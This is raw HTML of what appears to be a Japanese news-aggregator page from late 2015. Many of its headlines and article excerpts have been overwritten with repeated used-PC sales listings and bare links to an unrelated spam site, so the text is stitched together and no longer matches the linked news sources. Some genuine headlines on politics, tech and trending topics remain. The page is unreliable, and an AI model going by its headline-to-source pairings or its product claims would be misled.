AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 中古一体型パソコン SONY VGC-JS52JB Pentium Dual CPU E5200 2.5GHz/PC2-5300 1GB/HDD 500GB/DVDマルチドライブ/無線LAN内蔵/WindowsVista Home Premium導入/OFFICE2013付き中古</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古 特別セール&新品無線マウスプレゼント特典 中古ノートパソコンNEC VersaPro VJ16M/EF-X CeleronM 1.6GHz/PC2700 768MB/HDD 40GB(DtoD)/DVDコンボドライブ/WindowsXP Pro導入済み/リカバリ領域?OFFICE2013付き!/ノートPC,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古 中古ノートパソコン FUJITSU FMV-BIBLO NB55K/T CeleronM 1.30GHz/DDRメモリ 1GB/HDD 100GB/WindowsXP Home Edition/DVDマルチドライブ/OFFICE2013付き</span>...[<a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 70 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">398<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410589m60ji.html">http://factory.aedew.com/images/Core2Duo/020410589m60ji.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 55 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">198<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://www.yomiuri.co.jp/national/20151226-OYT1T50002.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410425s80vu.html">http://factory.aedew.com/images/Core2Duo/020410425s80vu.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 36 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">194<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/life/news/151226/lif1512260005-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 訳あり? 中古一体型パソコン SONY VGC-JS50B Pentium Dual-Core E2200 2.20GHz/PC2-6400 2GB/HDD 320GB/DVDマルチドライブ/新品USB無線LAN搭載/WindowsVista Home Premium導入/OFFICE2013付き 中古,中古パソコン 11n対応新品無線LANアダプター付き? 中古ノートパソコン TOSHIBA dynabook Satellite B450/B/Intel Celeron 925 2.3GHz/PC3-8500 2GB/HDD 250GB/DVDマルチドライブ/Windows7 Professional 32ビット/リカバリ領域?OFFICE2013付き中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 30 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">191<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT662ZHDTTPJB01B.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古 【MRR対応 中古ノートパソコン 】【15.4型WXGA光沢液晶】【無線LAN内蔵】【地上アナログTV】TOSHIBA Qosmio F20/575LSBB CeleronM 360 1.4GHz/PC2-5300 1.5GB/HDD 80GB/DVDマルチドライブ/Windows7 Home Premium SP1 32ビット/リカバリCD?OFFICE2013付きP15Aug15</a></div> </div> <span class='debug' style='display:none;'><!--score: 29 --></span> <div class="more"><a href="http://www.yomiuri.co.jp/latestnews/?from=ygnav2">ニュース総合 をもっと見る</a></div> </div> <a name="area_2"></a> <div class="item_list_box " id="area_2"> <div class="list_title"> <div class="controler"></div> <h2><a href="http://factory.aedew.com/images/Core2Duo/020411036z62hc.html">http://factory.aedew.com/images/Core2Duo/020411036z62hc.html</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over100">146<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【岸田外相訪韓】元慰安婦支援で日韓“折半”出資案が浮上 韓国の蒸し返しを封じる狙い(1/2ページ) - 産経ニュース</a></div> <div class="thumbnail"><a class="trimming imgbox" href="http://ceron.jp/url/www.sankei.com/politics/news/151226/plt1512260001-n1.html" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" width="120" height="170" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,限定一台中古パソコン 中古 デスク NEC Mate MK32MB-B Core i5 650 3.2GHz/PC3-10600 4GB/HDD 500GB/DVDマルチドライブ/Windows7 Professional 64ビット/OFFICE2013付き,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 地デジテレビ対応?新品無線マウス?キーボードセット?中古一体型パソコン NEC VALUESTAR VN770/R Core2Duo E7200 2.53GHz/2GB/HDD 500GB(DtoD)/DVDマルチドライブ/無線LAN内蔵/WindowsVista Home Premium導入/リカバリ領域?OFFICE2013付き中古,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古 デジタルテレビ機能付き?中古一体型パソコン FUJITSU DESKPOWER FMV LX55W/D Core2Duo E4300 1.8GHz/PC2-5300 2GB/HDD 400GB/DVDマルチドライブ/新品外付け無線LAN付き/Windows7 Home Premium SP1導入/中古 PC/Windows 7/リカバリCD?OFFICE2013付き</span>...[<a href="http://www.sankei.com/politics/news/151226/plt1512260001-n1.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 27 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">69<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://www.sankei.com/politics/news/151226/plt1512260002-n1.html" target="_blank" class="item_direct"> - www.sankei.com</a></div> <div class="item_title"><a href="">【辺野古移設問題】活動家を初の起訴 シュワブ前で機動隊員を蹴る 反対派の活動実態を解明へ(1/2ページ) - 産経ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 16 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://www.yomiuri.co.jp/world/20151225-OYT1T50134.html" target="_blank" class="item_direct"> - www.yomiuri.co.jp</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 中古 デスク NEC J ME-7 MJ31AE-7 Intel Core2Duo E8500 3.16GHz/PC2-5300 4GB/HDD 500GB/DVDマルチドライブ/Windows7 Home Premium SP1 32ビット/OSリカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 13.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over100">129<span>コメント</span></span> <span class="date date_new">9 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="/url/headlines.yahoo.co.jp/hl?a=20151225-00050134-yom-int">ソウル日本大使館前の少女像、韓国が移転を検討 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 13 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">86<span>コメント</span></span> <span class="date date_new">17 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151225-00000001-jct-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410333d23ds.html">http://factory.aedew.com/images/Core2Duo/020410333d23ds.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 10 --></span> <div class="more"><a href="http://news.yahoo.co.jp/hl?c=bus">政治・経済 をもっと見る</a></div> </div> <a name="area_5"></a> <div class="item_list_box " id="area_5"> <div class="list_title"> <div class="controler"></div> <h2><a href="">IT・テクノロジー</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">24<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank" class="item_direct"> - pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">【モバイラーが憧れた名機を今風に蘇らせる】ソニー「バイオノート505エクストリーム」 ~最初にして最後の究極。これぞモバイラーのステータス - PC Watch</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/d4cd9a68ed5dd7ad42cacbc69a1cf4fe257d279e.jpg" width="160" height="120" onerror="this.parentNode.style.display='none'" style="left:-20px" /></a></div><p>HDDは東芝製の5mm厚の1.8インチタイプ。これもフレキケーブルで接続されている 天板および底面カバーだが、店頭モデルでは「<span>ニッケル強化カーボンモールド」、ソニースタイル専用の直販モデルでは「カーボンファイバー積層板」を採用するとされている。今回入手したのは店頭モデルで、前者を採用している。“ニッケル強化カーボンモ</span>...[<a href="http://pc.watch.impress.co.jp/docs/column/mobiler/20151226_737137.html" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">1 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/news/news/20151226_737187.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410471g77vv.html">http://factory.aedew.com/images/Core2Duo/020410471g77vv.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">97<span>コメント</span></span> <span class="date date_new">22 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news108.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="">中古パソコン 11n新品小型無線LANアダプタ付き?中古ノートパソコン FUJITSU LIFEBOOK A531/DX Core i3-2330 2.20GHz/2GB/HDD 250GB/DVDマルチドライブ/Windows7 Professional導入/リカバリ領域?OFFICE2013付き 中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">88<span>コメント</span></span> <span class="date date_new">20 時間前  </span> <a href="http://www.itmedia.co.jp/news/articles/1512/25/news130.html" target="_blank" class="item_direct"> - www.itmedia.co.jp</a></div> <div class="item_title"><a href="http://ceron.jp/url/www.itmedia.co.jp/news/articles/1512/25/news130.html">4文字しか使えないコミュニケーションアプリ「Ping」 - ITmedia ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">13<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://akiba-pc.watch.impress.co.jp/docs/wakiba/find/20151225_737149.html" target="_blank" class="item_direct"> - akiba-pc.watch.impress.co.jp</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン NEC LaVie LL370/S AMD Sempron x2 Dual-Core NI-52 1.80GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き,中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き </a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">IT・テクノロジー をもっと見る</a></div> </div> <a name="area_7"></a> <div class="item_list_box " id="area_7"> <div class="list_title"> <div class="controler"></div> <h2><a href="">科学・学問</a></h2> </div> <div class="item"> <div class="item_status"> <span class="link_num over20">22<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news025.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411051g57pq.html">http://factory.aedew.com/images/Core2Duo/020411051g57pq.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">13 時間前  </span> <a href="http://www.asahi.com/articles/ASHDT7KWMHDTPTIL02V.html" target="_blank" class="item_direct"> - www.asahi.com</a></div> <div class="item_title"><a href="">阪大院教授らの研究費不正経理、2.7億円 大学が発表:朝日新聞デジタル</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://karapaia.livedoor.biz/archives/52207962.html" target="_blank" class="item_direct"> - karapaia.livedoor.biz</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン NEC VersaPro VE-8 VY25AE-8 CPU Core2Duo P8700 2.53GHz/PC3-8500 4GB/HDD 120GB/DVDマルチドライブ/無線LAN内蔵/Windows7 Home Premium SP1 32ビット/リカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 1 --></span> <div class="more"><a href="">科学・学問 をもっと見る</a></div> </div> <a name="area_9"></a> <div class="item_list_box " id="area_9"> <div class="list_title"> <div class="controler"></div> <h2><a href="">2chまとめ</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">27<span>コメント</span></span> <span class="date date_new">7 時間前  </span> <a href="http://alfalfalfa.com/articles/140445.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">書店「Amazonばっかで本買うのやめてや!!」←これ | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3b61c537fc58f529bf419a5c974cab5d82588790.jpg" width="213" height="120" onerror="this.parentNode.style.display='none'" style="left:-46px" /></a></div><p>14:風吹けば名無し@\(^o^)/2015/12/25(金) 10:07:08.94ID:28CoKVMbaXMAS.net焼<span>肉屋の名前みたい34:風吹けば名無し@\(^o^)/2015/12/25(金) 10:09:31.60ID:uAnL49f+0XMAS.net普通に本屋で買ってるぞ54:風吹けば名無し@\(^o^)/2015/12/25(金) 10</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">18<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://blog.esuteru.com/archives/8449829.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">【は?】「『仏滅』『大安』などが書かれたカレンダーを回収します。差別につながるので」 ← 意味不明すぎて理解できないんだが : はちま起稿</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">66<span>コメント</span></span> <span class="date date_new">14 時間前  </span> <a href="http://blog.livedoor.jp/dqnplus/archives/1864971.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410513v56lb.html">http://factory.aedew.com/images/Core2Duo/020410513v56lb.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">2 時間前  </span> <a href="http://alfalfalfa.com/articles/140453.html" target="_blank" class="item_direct"> - alfalfalfa.com</a></div> <div class="item_title"><a href="">SEALDs「電車で携帯のゲームやるのは知能が低い」 | 2ちゃんねるスレッドまとめブログ - アルファルファモザイク</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">16<span>コメント</span></span> <span class="date date_new">5 時間前  </span> <a href="http://blog.esuteru.com/archives/8449718.html" target="_blank" class="item_direct"> - blog.esuteru.com</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 中古ノートパソコン FUJITSU FMV-BIBLO NF/B50 Intel Core2Duo T8100 2.10GHz/PC2-5300 4GB/HDD 250GB/無線内蔵/DVDマルチドライブ/Windows7 Home Premium 導入/リカバリCD?OFFICE2013付き中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">14<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://blog.livedoor.jp/kinisoku/archives/4554064.html" target="_blank" class="item_direct"> - blog.livedoor.jp</a></div> <div class="item_title"><a href="">【画像】おい!クリスマスだしこの娘と野球拳しないかい:キニ速</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="more"><a href="">2chまとめ をもっと見る</a></div> </div> <a name="area_10"></a> <div class="item_list_box " id="area_10"> <div class="list_title"> <div class="controler"></div> <h2><a href="">ネタ・話題・トピック</a></h2> </div> <div class='pickup'><div class="item detail_item"> <div class="item_status"> <span class="link_num over20">90<span>コメント</span></span> <span class="date date_new">15 時間前  </span> <a href="http://togetter.com/li/917078" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">【速報】クリスマスに新たな山下達郎伝説が生まれた!? 「Gの音が出ない」と開始90分後にライブを中止 - Togetterまとめ</a></div> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/9ff1006fb7b6091ba48b957edf5a63cce85e1079.jpg" width="120" height="159" onerror="this.parentNode.style.display='none'" style="left:0px" /></a></div><p>山下達郎盛岡コンサート、90分やったところでまさかの中止。 本人が喉の調子に納得出来ないとのこと。 来年に無料で再演しにくるとの<span>ことで、伝説に立ち合えたのはラッキーだが、クリスマスイブ聞けなかった。</span>...[<a href="" target="_blank">続きを読む</a>]</p> </div> </div><span class='debug' style='display:none;'><!--score: 6.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://nlab.itmedia.co.jp/nl/articles/1512/26/news015.html" target="_blank" class="item_direct"> - nlab.itmedia.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410544s57yq.html">http://factory.aedew.com/images/Core2Duo/020410544s57yq.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 4 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">15<span>コメント</span></span> <span class="date date_new">3 時間前  </span> <a href="http://togetter.com/li/917238" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410425s80vu.html">http://factory.aedew.com/images/Core2Duo/020410425s80vu.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 3 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">80<span>コメント</span></span> <span class="date">2015-12-25 12:31</span> <a href="http://togetter.com/li/916919" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン SONY VAIO PCG-GRT77/BPentium4 2.66GHz/PC-2700 1GB/HDD 60GB/DVDマルチドライブ/Windows7 Home Premium SP1 32ビット/OSリカバリCD?OFFICE2013付き</a></div> </div> <span class='debug' style='display:none;'><!--score: 2.5 --></span> <div class="item"> <div class="item_status"> <span class="link_num over20">62<span>コメント</span></span> <span class="date">2015-12-25 08:36</span> <a href="http://d.hatena.ne.jp/ikkou2otosata0/touch/20151225/1450992232" target="_blank" class="item_direct"> - d.hatena.ne.jp</a></div> <div class="item_title"><a href="">オッケー、キリスト。ところで、あたしの誕生日の話も聞いとく? - 私の時代は終わった。</a></div> </div> <span class='debug' style='display:none;'><!--score: 2 --></span> <div class="item"> <div class="item_status"> <span class="link_num over3">17<span>コメント</span></span> <span class="date date_new">12 時間前  </span> <a href="http://togetter.com/li/917157" target="_blank" class="item_direct"> - togetter.com</a></div> <div class="item_title"><a href="">中古 中古ノートパソコン DELL Inspiron 1501 AMD Athlon64 X 2 TK-53 1.7GHz/PC2-5300 2GB/HDD 120GB/DVDマルチドライブ/無線LAN/Windows7 Home Premium 導入/リカバリCD・OFFICE2013付き ,中古パソコン 中古一体型パソコン FUJITSU FMV-DESKPOWER F/C50T Core2Duo P8400 2GBメモリ HDD 320GB 無線 DVDマルチ WindowsVista リカバリ領域 KingosftOffice付(2013) パソコン 一体型パソコン 中古</a></div> </div> <span class='debug' style='display:none;'><!--score: 1.5 --></span> <div class="more"><a href="">ネタ・話題・トピック をもっと見る</a></div> </div> <script type="text/javascript"> //現在のセッティングを読み込み var setting = "ct:news:5;ct:society:5;ct:entertainment:5;ct:sports:5;ct:itnews:5;ct:international:3;ct:science:3;ct:odekake:3;ct:2ch:6;ct:neta:6;"; var setting_list = new Array(); setting_split = setting.split(";"); for (var i = 0; i < setting_split.length; i++) { if(!setting_split[i]){continue}; if(m = setting_split[i].match(/^([a-z]*):(.*):(d*)$/)){ setting_list[i+1] = new Array(m[1],m[2],m[3]); }else{ setting_list[i+1] = new Array(); } } controler_set(); </script> <!-- 以下カスタム用HTML --> <div id="edit_area_module" style="display:none;"> <div id="edit_area_AREAID" style="display:none;margin-bottom: 1em;"> <div class="list_title" style="text-align:right;font-size:85%;font-weight:100;"> <a href="javascript:void(0);" onclick="area_change_cancel(AREAID)">キャンセル</a> <div class="controler" style="display:none;"></div> </div> <div id="edit_area_inner_AREAID" style="border:8px solid #ccc;padding:3em 15%;font-size:90%;"> <h3>AREAID 番目のエリア</h3> <p>このエリアに表示するニュースを設定します。</p> <div id="edit_area_1_AREAID"> <select id="select_1_AREAID" onchange="edit_area_2(AREAID)" style="margin-top:1em;"> <option value="">▼表示内容を選んでください▼</option> <option value="ct">カテゴリから選ぶ</option> <option value="kw">任意のキーワードを指定する</option> </select> </div> <br /> <div id="edit_area_2ct_AREAID" style="display:none;"> <select id="select_2ct_AREAID"> <option value="">▼カテゴリを選んでください▼</option> <option value="all">すべての記事</option> <option value="news">ニュース総合</option> <option value="society">政治・経済</option> <option value="international">海外ニュース</option> <option value="entertainment">エンタメ</option> <option value="sports">スポーツ</option> <option value="itnews">IT・テクノロジー</option> <option value="science">科学・学問</option> <option value="odekake">おでかけ・イベント</option> <option value="2ch">2chまとめ</option> <option value="neta">ネタ・話題・トピック</option> <option value="movie">動画</option> <option value="other">その他のニュース</option> </select> </div> <div id="edit_area_2kw_AREAID" style="display:none;"> キーワードを入力してください。<input id="select_2kw_AREAID" type="text" value="KEYWORD" size="32" /><br /> <div style="font-size:85%;color:#666;background:#eee;padding:0.5em;margin:0.5em 0;"> 入力したキーワードにヒットするニュースが配信されます。<br /> <b>複数指定</b>「AAA BBB」:スペースで区切るとAAAかつBBBにマッチする記事を配信します。<br /> <b>OR指定</b>「AAA OR BBB」:AAAまたはBBBにマッチする記事を配信します。ORはパイプ(|)も可。<br /> <b>特定のサイトを指定</b>「site:[URL]」:特定のURLにマッチする記事を配信します。<br /> <b>除外指定</b>「-XXX」:マイナスを付けると「XXX」にマッチする記事を除外します。 </div> </div> <div id="edit_area_3num_AREAID" style="display:none;"> 表示する数:<select id="select_3num_AREAID">NUMLIST</select> </div> <br /> <div style="line-height:2.5;"> <input type="button" value=" 決定 " onclick="area_change_save(AREAID)" style="font-size:150%;"/><br /> <input type="button" value="キャンセル" onclick="area_change_cancel(AREAID)" /> <input type="button" value="このエリアを削除" onclick="area_delete(AREAID)" /> <input type="button" value="この下にエリアを追加" onclick="area_add(AREAID)" /> <br /> <input type="button" value="1つ上へ移動" onclick="area_move(AREAID,-1)" /> <input type="button" value="1つ下へ移動" onclick="area_move(AREAID,1)" /> </div> </div> </div> </div> <!-- カスタム用HTMLここまで --> <div id="top_guidance"> </div><div class='pagenavi'><a href=''>全カテゴリ横断</a> <a href=''>昨日のランキング</a> </div><script type="text/javascript">footerbox_ad();</script></div> </div> <div id="side_column"> <div id="side_column_inner"> <div id="sidefollow"> <script type="text/javascript">sidebox_ad1()</script> <div id="side_flash" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">速報</a></h2></div> <div class="item_list_box"><div class="item"> <div class="item_status"> <span class="link_num over20">21<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/63a4858e236b" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="">2016年新ヒーロー戦隊は「動物戦隊ジュウオウジャー」 - LINE NEWS</a></div> </div> <div class="item"> <div class="item_status"> <span class="link_num over3">11<span>コメント</span></span> <span class="date date_new">42 分前   </span> <a href="http://news.line.me/list/886887b5/eee8981f1889" target="_blank" class="item_direct"> - news.line.me</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020410379n85tz.html">http://factory.aedew.com/images/Core2Duo/020410379n85tz.html</a></div> </div> <div id="side_imgs" style="margin-bottom:4px;"> <div class="list_title"><h2><a href="">画像で見る主要ニュース</a></h2></div> <div class="item_list_box"><div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/db592e52fb3695e73bb88902c6c90a5b239cd30b.jpg" width="120" height="120" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over500">506<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00050002-yom-soci" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">大安・仏滅…記載は不適切、県がカレンダー回収 (読売新聞) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 67 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/770aec9bed626d0714c63dd827bad4f4c20876b2.jpg" width="120" height="172" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">387<span>コメント</span></span> <span class="date date_new">4 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000062-san-sctch" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="http://factory.aedew.com/images/Core2Duo/020411053z92jr.html">http://factory.aedew.com/images/Core2Duo/020411053z92jr.html</a></div> </div> <span class='debug' style='display:none;'><!--score: 28 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/f2a5b22bc8e16c4289aaf7767c8ef71cce9c4104.jpg" width="120" height="129" onerror="this.src='/img/no_image.gif';this.width='120';this.height='120';" style="left:0px" /></a></div> <div class="item_status"> <span class="link_num over100">134<span>コメント</span></span> <span class="date date_new">6 時間前  </span> <a href="http://headlines.yahoo.co.jp/hl?a=20151226-00000004-nksports-socc" target="_blank" class="item_direct"> - headlines.yahoo.co.jp</a></div> <div class="item_title"><a href="">柿谷曜一朗C大阪復帰 違約金大幅減少で完全移籍へ (日刊スポーツ) - Yahoo!ニュース</a></div> </div> <span class='debug' style='display:none;'><!--score: 26 --></span> <div class="item_box"> <div class="thumbnail"><a class="trimming imgbox" href="" style="width:120px;height:120px;"><img src="http://img.ceron.jp/3d712f4a9f0d5a17af803c20b36a4d9d8bec0ea2.jpg" 